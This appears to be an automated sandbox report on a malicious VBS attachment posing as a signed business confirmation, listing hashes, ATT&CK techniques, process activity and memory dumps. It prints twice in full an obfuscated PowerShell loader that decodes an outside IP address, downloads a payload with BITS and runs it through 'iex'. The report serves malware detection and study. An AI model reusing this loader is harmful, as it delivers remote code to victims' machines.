fb7b4de6fe1e517caccbdde9450c7c42d5ba1a42e0a5e5c14e362aeb6ad67745

Analysis

max time kernel
150s
max time network
130s
platform
windows10-1703_x64
resource
win10-20230703-en
resource tags

arch:x64arch:x86image:win10-20230703-enlocale:en-usos:windows10-1703-x64system
submitted
17/07/2023, 05:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Signed_businessConfirmation_Reference-09282-QIIEE__127KB_000289272653.vbs
Size

5KB
MD5

98c31b202cc3fd8c47b61f085dd4ebfc
SHA1

c678fb695edcb72af3d82f52f1b8292f17398a2e
SHA256

fb7b4de6fe1e517caccbdde9450c7c42d5ba1a42e0a5e5c14e362aeb6ad67745
SHA512

70a0022efaaf7cbbfa3bf4da057a301b8455a844b25510db7db77690fe714d6a7de210647444792a6eee5b53a731b35558eca0077b56f81a5b97bde19c0ba13e
SSDEEP

96:uthC/xE7YcYmAcQ03Lo4PMX0GFf66OticvLmC4EdR4Z8Y:OhC/3NmAcQ03Lo4kX0GFfZOtVL3I8Y

Score

7^/10

Malware Config

Signatures

Checks QEMU agent file 2 TTPs 1 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2652	powershell.exe
2652	powershell.exe
2652	powershell.exe
3624	powershell.exe
3624	powershell.exe
3624	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2652	powershell.exe
Token: SeDebugPrivilege	3624	powershell.exe

Suspicious use of WriteProcessMemory 5 IoCs

description	pid	Process	procid_target
PID 2472 wrote to memory of 2652	2472	WScript.exe	70
PID 2472 wrote to memory of 2652	2472	WScript.exe	70
PID 2652 wrote to memory of 3624	2652	powershell.exe	73
PID 2652 wrote to memory of 3624	2652	powershell.exe	73
PID 2652 wrote to memory of 3624	2652	powershell.exe	73

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Signed_businessConfirmation_Reference-09282-QIIEE__127KB_000289272653.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2472
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Potteringd1979 ([String]$Skovturene){$Kanukaoops=$Skovturene.toCharArray();For($Fashesuna=5; $Fashesuna -lt $Kanukaoops.count-1; $Fashesuna+=(5+1)){$Elec+=$Kanukaoops[$Fashesuna]};$Elec;}$Vinyletbr=Potteringd1979 'ImperhChuddtDisjatBudgepMessi:Disda/ Vejt/Lskbe9 shay1 Over. Klas2Palle4Inche4Color.Epith1quart9Gokar7Amber.Duode9Mahua/ Multn PolieBredywSeizow Cred/Acadee Opint FouehFrakko TobelUnder. farap unbesStavkpDrivv ';$Elec01=Potteringd1979 'Kaos i Clave SpinxTagry ';$Frstegang = Potteringd1979 ' Akti\Tooths GracySnyltsCodasw JereoGevalwScaw 6Unibr4 Vand\BankdWindvniFrittn IndidVenino PeriwPerensFeltsPpuddeo ThrewKerubePortir RatiSMartahFaktue MarilFestflBesta\Brachvelast1Woolg. Gdni0 tabe\KristpSildeoUnrefw Andee ProgrAlkalsSjagghsvrmeeStkyslstolelsacro.Ambite styrx RockeMasse ';.($Elec01) (Potteringd1979 'Behan$ TearOMarkeo UndenSlutdaAnonyb Slan2Preoc= Spis$MademeunwhinNdrinvTiger:Underw SgefiunrevnGrenadDanseiGemitrSkaer ') ;.($Elec01) (Potteringd1979 'Kuwai$ UdlgFMalpar CentsPrinct Telae DimegVauntaUdpakn Voldg Bran= Nidk$MrtelOCameoo Beden sideaLavpab Skod2 Smut+Oblig$PrcisFFotografflisDecimt SaldeAncylgrelucaPartnn DirtgErken ') ;.($Elec01) (Potteringd1979 ' Dwin$ VariEMigratGigabv DuckrBarreeSjles Letti=Hamme Rema( Pyrr(Olmerg tretwBoligmHaspei Indi farvw VogniStabinTeena3Adels2Grobi_ AfaspImpolrAntheo mudacOverpeIllits ForusDiape Reini- OrnaFManor SammPMiljrrSeparo Tonnc OvereUafvesAgates ZoosI Pacod Anal=hexam$Folke{ UnutPOdelsIHvlspDVinci} Apri)balus.FormaCluggeo ModemInitimProteaIndskn MaitdLjernLKontaiFalsin SkjoeEskap)Asson Demil-FlailsOverqpgallul FriviNapeatRudd Tonic[Etikec DecahDraabaConnerSlots]Enkel3Polyt4 Buti ');.($Elec01) (Potteringd1979 ' Neti$ UnbuIKalden Okket Miste AmphrFortyeFlirtsRetfasBagen Palk=Roban Unst$AsbesE FleltGuldkvApprarMidweeAitis[ Hals$Zink E Lesbt Bestv Carlr SteneAstea.Liniec aurooVideouGuldkn VrketCoali- Face2 Para]Sydve ');.($Elec01) (Potteringd1979 ' Drif$RepreDPandoi SupiaFritik SpejoSkulpn Engei BemrkAppleoFacio=ammia(MenurTEelspeEkvils dekltBlipp- kineP Straa prestInnovh Mous Sempe$ MundFCramprAnaths ErintHymnseCaligg ThyraMccafn Taugg Duod)Skruk Sundh-LaiseAObrotn TurkdSerra Neeb(Inhab[InterI TallnLookatjenkoP VivitPrecir Tide]Camer:Coxof:MailesConvoi Fletz CadmeGasun douz-DebareGtedeq Skri Sall8Laryn)Nosta ') ;if ($Diakoniko) {.$Frstegang $Interess;} else {;$Elec00=Potteringd1979 ' BelaS VacutKvaliaGluter camptStenc- LuftB FootiCommetHffdis overT Korar braca Unden StarsUnthifskribeRens r Eyeg Bulwa- CoevS Doppo MuseuEnalyrPestec Effleprevo Unbo$UnretVSammeiSplennApyreyIodatlRivieeFlagetDramab Tromr Medd Unip-VestmDBlokieStrugsbadevt KlagiPhellnLinjea TewstAasasi FurmoIraqinWater Amer$pellmO Mispo Preon KrmmaUopslb Blas2Recur ';.($Elec01) (Potteringd1979 'Detai$claviOBrydeo Rawnn PredaAdipibSlutm2reest=Forty$KraureBrawnn blaavPlade: Ordua DevapTossmp Unmed Pyroa Reflt antiaRuffe ') ;.($Elec01) (Potteringd1979 'SyzygIhousemVejmap DeseointerrCarpetTaraf-AmyelMLevitoHunandFrsteufractlInsane Proe thortBTellui GisptRotars DrumTForharRespaaTurdan TilbsAmforfOropheForver Rigs ') ;$Oonab2=$Oonab2+'\Startsi.bou';while (-not $Bldgrels) {.($Elec01) (Potteringd1979 'Zooth$ValetB afpllOpiumd NollgBookkrVidere Overl Attis Scal= Bipi(royetT Votee Brnes Foret Mang- lumiPWateraaftentPostmh Kimc Pseud$ RulsO Sproo petrn PrjuaFrequbForst2Lifeb)Hazer ') ;.($Elec01) $Elec00;.($Elec01) (Potteringd1979 'WeirdS carbt SagoaUfiksrMillitMatte-TarsoSCryoclDgndreTangfeBestrpAscom Ostr5Chili ');}.($Elec01) (Potteringd1979 ' Treg$ UdskP RaakoDannetTaxavtHustoeSensarFloneiUncomnPlanig sansd Hose1Besti9 Nuta7 Semi Mopl=Tubis uddybG ivereLemurtSamsa-FractC Vrtpo MlkenPaleotFlavieAvet nSurfltMian Forl$GiskeO SporoBuknin Camoa ForrbPleom2 Macr ');.($Elec01) (Potteringd1979 ' Supe$AstraSBakkaePlanel Fogev Reat Skaa=Ireos pay [ PebeSPremoy Misis krestFastbeImprim Garn. StraCTrngsoColeonImmeav SouteLithor nedktFulde]Killj:Turma:SepulF OsterSnerro Omgnm chriBCanceawoodis TrsteSerge6Usigt4BusynS Vivit ErklrRicheiArbutnKultugBauhi( Bili$OphidPUnoldo CotttMumiftBeshee PresrLegali Supen Akiag GoosdPlast1Natur9Aands7Bross) Rigs ');.($Elec01) (Potteringd1979 'Forar$DoterEBlouslAfskrechertcUdmal2Unpaw Drogi=Futur Abiot[LastnSatelyyAfsoesSplejtpiloseAfgham Plum. OpstTNotate Mindxaskebt Pera. CallEprogrn CostcIdolioJacald KryoiJensknEmbalg Marl]Sgerk:Eksam:resusA eksaS SheyCTouchISamtiIGavfl. SubcGEmulgeFlesht VehiS SisytMoerkr Bacti Yearn CrisgOvers(Tddel$ StryS HekhePluralAlphov Vene)Exurb ');.($Elec01) (Potteringd1979 'Klatr$UnawaBKviddlrefero Intec elaekRegeri Ulnos NutihHarmol Assa=halsr$DruknE defilCovile RetocUdfrs2 Euro. glams Sjusu Unrab Citas velutFurorrNewfaiThrean Helig Hste(Frikt2 Pres0Sycop3 Nonw7 Forn0Hausf5Menzi, Ramp2Disul5 Unde8Efter5 Slkn5Udrug) Flle ');.($Elec01) $Blockishl;}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2652
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Potteringd1979 ([String]$Skovturene){$Kanukaoops=$Skovturene.toCharArray();For($Fashesuna=5; $Fashesuna -lt $Kanukaoops.count-1; $Fashesuna+=(5+1)){$Elec+=$Kanukaoops[$Fashesuna]};$Elec;}$Vinyletbr=Potteringd1979 'ImperhChuddtDisjatBudgepMessi:Disda/ Vejt/Lskbe9 shay1 Over. Klas2Palle4Inche4Color.Epith1quart9Gokar7Amber.Duode9Mahua/ Multn PolieBredywSeizow Cred/Acadee Opint FouehFrakko TobelUnder. farap unbesStavkpDrivv ';$Elec01=Potteringd1979 'Kaos i Clave SpinxTagry ';$Frstegang = Potteringd1979 ' Akti\Tooths GracySnyltsCodasw JereoGevalwScaw 6Unibr4 Vand\BankdWindvniFrittn IndidVenino PeriwPerensFeltsPpuddeo ThrewKerubePortir RatiSMartahFaktue MarilFestflBesta\Brachvelast1Woolg. Gdni0 tabe\KristpSildeoUnrefw Andee ProgrAlkalsSjagghsvrmeeStkyslstolelsacro.Ambite styrx RockeMasse ';.($Elec01) (Potteringd1979 'Behan$ TearOMarkeo UndenSlutdaAnonyb Slan2Preoc= Spis$MademeunwhinNdrinvTiger:Underw SgefiunrevnGrenadDanseiGemitrSkaer ') ;.($Elec01) (Potteringd1979 'Kuwai$ UdlgFMalpar CentsPrinct Telae DimegVauntaUdpakn Voldg Bran= Nidk$MrtelOCameoo Beden sideaLavpab Skod2 Smut+Oblig$PrcisFFotografflisDecimt SaldeAncylgrelucaPartnn DirtgErken ') ;.($Elec01) (Potteringd1979 ' Dwin$ VariEMigratGigabv DuckrBarreeSjles Letti=Hamme Rema( Pyrr(Olmerg tretwBoligmHaspei Indi farvw VogniStabinTeena3Adels2Grobi_ AfaspImpolrAntheo mudacOverpeIllits ForusDiape Reini- OrnaFManor SammPMiljrrSeparo Tonnc OvereUafvesAgates ZoosI Pacod Anal=hexam$Folke{ UnutPOdelsIHvlspDVinci} Apri)balus.FormaCluggeo ModemInitimProteaIndskn MaitdLjernLKontaiFalsin SkjoeEskap)Asson Demil-FlailsOverqpgallul FriviNapeatRudd Tonic[Etikec DecahDraabaConnerSlots]Enkel3Polyt4 Buti ');.($Elec01) (Potteringd1979 ' Neti$ UnbuIKalden Okket Miste AmphrFortyeFlirtsRetfasBagen Palk=Roban Unst$AsbesE FleltGuldkvApprarMidweeAitis[ Hals$Zink E Lesbt Bestv Carlr SteneAstea.Liniec aurooVideouGuldkn VrketCoali- Face2 Para]Sydve ');.($Elec01) (Potteringd1979 ' Drif$RepreDPandoi SupiaFritik SpejoSkulpn Engei BemrkAppleoFacio=ammia(MenurTEelspeEkvils dekltBlipp- kineP Straa prestInnovh Mous Sempe$ MundFCramprAnaths ErintHymnseCaligg ThyraMccafn Taugg Duod)Skruk Sundh-LaiseAObrotn TurkdSerra Neeb(Inhab[InterI TallnLookatjenkoP VivitPrecir Tide]Camer:Coxof:MailesConvoi Fletz CadmeGasun douz-DebareGtedeq Skri Sall8Laryn)Nosta ') ;if ($Diakoniko) {.$Frstegang $Interess;} else {;$Elec00=Potteringd1979 ' BelaS VacutKvaliaGluter camptStenc- LuftB FootiCommetHffdis overT Korar braca Unden StarsUnthifskribeRens r Eyeg Bulwa- CoevS Doppo MuseuEnalyrPestec Effleprevo Unbo$UnretVSammeiSplennApyreyIodatlRivieeFlagetDramab Tromr Medd Unip-VestmDBlokieStrugsbadevt KlagiPhellnLinjea TewstAasasi FurmoIraqinWater Amer$pellmO Mispo Preon KrmmaUopslb Blas2Recur ';.($Elec01) (Potteringd1979 'Detai$claviOBrydeo Rawnn PredaAdipibSlutm2reest=Forty$KraureBrawnn blaavPlade: Ordua DevapTossmp Unmed Pyroa Reflt antiaRuffe ') ;.($Elec01) (Potteringd1979 'SyzygIhousemVejmap DeseointerrCarpetTaraf-AmyelMLevitoHunandFrsteufractlInsane Proe thortBTellui GisptRotars DrumTForharRespaaTurdan TilbsAmforfOropheForver Rigs ') ;$Oonab2=$Oonab2+'\Startsi.bou';while (-not $Bldgrels) {.($Elec01) (Potteringd1979 'Zooth$ValetB afpllOpiumd NollgBookkrVidere Overl Attis Scal= Bipi(royetT Votee Brnes Foret Mang- lumiPWateraaftentPostmh Kimc Pseud$ RulsO Sproo petrn PrjuaFrequbForst2Lifeb)Hazer ') ;.($Elec01) $Elec00;.($Elec01) (Potteringd1979 'WeirdS carbt SagoaUfiksrMillitMatte-TarsoSCryoclDgndreTangfeBestrpAscom Ostr5Chili ');}.($Elec01) (Potteringd1979 ' Treg$ UdskP RaakoDannetTaxavtHustoeSensarFloneiUncomnPlanig sansd Hose1Besti9 Nuta7 Semi Mopl=Tubis uddybG ivereLemurtSamsa-FractC Vrtpo MlkenPaleotFlavieAvet nSurfltMian Forl$GiskeO SporoBuknin Camoa ForrbPleom2 Macr ');.($Elec01) (Potteringd1979 ' Supe$AstraSBakkaePlanel Fogev Reat Skaa=Ireos pay [ PebeSPremoy Misis krestFastbeImprim Garn. StraCTrngsoColeonImmeav SouteLithor nedktFulde]Killj:Turma:SepulF OsterSnerro Omgnm chriBCanceawoodis TrsteSerge6Usigt4BusynS Vivit ErklrRicheiArbutnKultugBauhi( Bili$OphidPUnoldo CotttMumiftBeshee PresrLegali Supen Akiag GoosdPlast1Natur9Aands7Bross) Rigs ');.($Elec01) (Potteringd1979 'Forar$DoterEBlouslAfskrechertcUdmal2Unpaw Drogi=Futur Abiot[LastnSatelyyAfsoesSplejtpiloseAfgham Plum. OpstTNotate Mindxaskebt Pera. CallEprogrn CostcIdolioJacald KryoiJensknEmbalg Marl]Sgerk:Eksam:resusA eksaS SheyCTouchISamtiIGavfl. SubcGEmulgeFlesht VehiS SisytMoerkr Bacti Yearn CrisgOvers(Tddel$ StryS HekhePluralAlphov Vene)Exurb ');.($Elec01) (Potteringd1979 'Klatr$UnawaBKviddlrefero Intec elaekRegeri Ulnos NutihHarmol Assa=halsr$DruknE defilCovile RetocUdfrs2 Euro. glams Sjusu Unrab Citas velutFurorrNewfaiThrean Helig Hste(Frikt2 Pres0Sycop3 Nonw7 Forn0Hausf5Menzi, Ramp2Disul5 Unde8Efter5 Slkn5Udrug) Flle ');.($Elec01) $Blockishl;}"
    3⤵
    - Checks QEMU agent file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3624

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t5dy2x5i.k3y.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
memory/2652-122-0x000001ABD0160000-0x000001ABD0182000-memory.dmp

Filesize
136KB

Download
memory/2652-124-0x00007FFC84250000-0x00007FFC84C3C000-memory.dmp

Filesize
9.9MB

Download
memory/2652-125-0x000001ABD0250000-0x000001ABD0260000-memory.dmp

Filesize
64KB

Download
memory/2652-126-0x000001ABD0250000-0x000001ABD0260000-memory.dmp

Filesize
64KB

Download
memory/2652-128-0x000001ABD0460000-0x000001ABD04D6000-memory.dmp

Filesize
472KB

Download
memory/2652-140-0x000001ABD0250000-0x000001ABD0260000-memory.dmp

Filesize
64KB

Download
memory/2652-239-0x000001ABD0250000-0x000001ABD0260000-memory.dmp

Filesize
64KB

Download
memory/2652-187-0x000001ABD0250000-0x000001ABD0260000-memory.dmp

Filesize
64KB

Download
memory/2652-179-0x000001ABD0250000-0x000001ABD0260000-memory.dmp

Filesize
64KB

Download
memory/2652-174-0x00007FFC84250000-0x00007FFC84C3C000-memory.dmp

Filesize
9.9MB

Download
memory/3624-161-0x0000000007CE0000-0x0000000007D56000-memory.dmp

Filesize
472KB

Download
memory/3624-185-0x0000000008E00000-0x0000000008E22000-memory.dmp

Filesize
136KB

Download
memory/3624-156-0x0000000007530000-0x0000000007596000-memory.dmp

Filesize
408KB

Download
memory/3624-157-0x0000000006CE0000-0x0000000006D46000-memory.dmp

Filesize
408KB

Download
memory/3624-158-0x0000000007620000-0x0000000007970000-memory.dmp

Filesize
3.3MB

Download
memory/3624-159-0x0000000007500000-0x000000000751C000-memory.dmp

Filesize
112KB

Download
memory/3624-160-0x0000000007A70000-0x0000000007ABB000-memory.dmp

Filesize
300KB

Download
memory/3624-154-0x0000000006D90000-0x00000000073B8000-memory.dmp

Filesize
6.2MB

Download
memory/3624-153-0x0000000001270000-0x0000000001280000-memory.dmp

Filesize
64KB

Download
memory/3624-177-0x0000000009480000-0x0000000009AF8000-memory.dmp

Filesize
6.5MB

Download
memory/3624-178-0x0000000008B90000-0x0000000008BAA000-memory.dmp

Filesize
104KB

Download
memory/3624-152-0x0000000001270000-0x0000000001280000-memory.dmp

Filesize
64KB

Download
memory/3624-184-0x0000000008EE0000-0x0000000008F74000-memory.dmp

Filesize
592KB

Download
memory/3624-155-0x0000000006C40000-0x0000000006C62000-memory.dmp

Filesize
136KB

Download
memory/3624-186-0x0000000009B00000-0x0000000009FFE000-memory.dmp

Filesize
5.0MB

Download
memory/3624-150-0x0000000001100000-0x0000000001136000-memory.dmp

Filesize
216KB

Download
memory/3624-230-0x0000000008FF0000-0x0000000009010000-memory.dmp

Filesize
128KB

Download
memory/3624-151-0x0000000073E70000-0x000000007455E000-memory.dmp

Filesize
6.9MB

Download
memory/3624-240-0x0000000001270000-0x0000000001280000-memory.dmp

Filesize
64KB

Download
memory/3624-261-0x0000000009220000-0x0000000009232000-memory.dmp

Filesize
72KB

Download
memory/3624-266-0x0000000073E70000-0x000000007455E000-memory.dmp

Filesize
6.9MB

Download
memory/3624-267-0x0000000001270000-0x0000000001280000-memory.dmp

Filesize
64KB

Download
memory/3624-268-0x0000000001270000-0x0000000001280000-memory.dmp

Filesize
64KB

Download
memory/3624-269-0x0000000001270000-0x0000000001280000-memory.dmp

Filesize
64KB

Download
memory/3624-271-0x0000000009250000-0x0000000009251000-memory.dmp

Filesize
4KB

Download
memory/3624-272-0x000000000A000000-0x000000000DC5D000-memory.dmp

Filesize
60.4MB

Download
memory/3624-416-0x00007FFCA00C0000-0x00007FFCA029B000-memory.dmp

Filesize
1.9MB

Download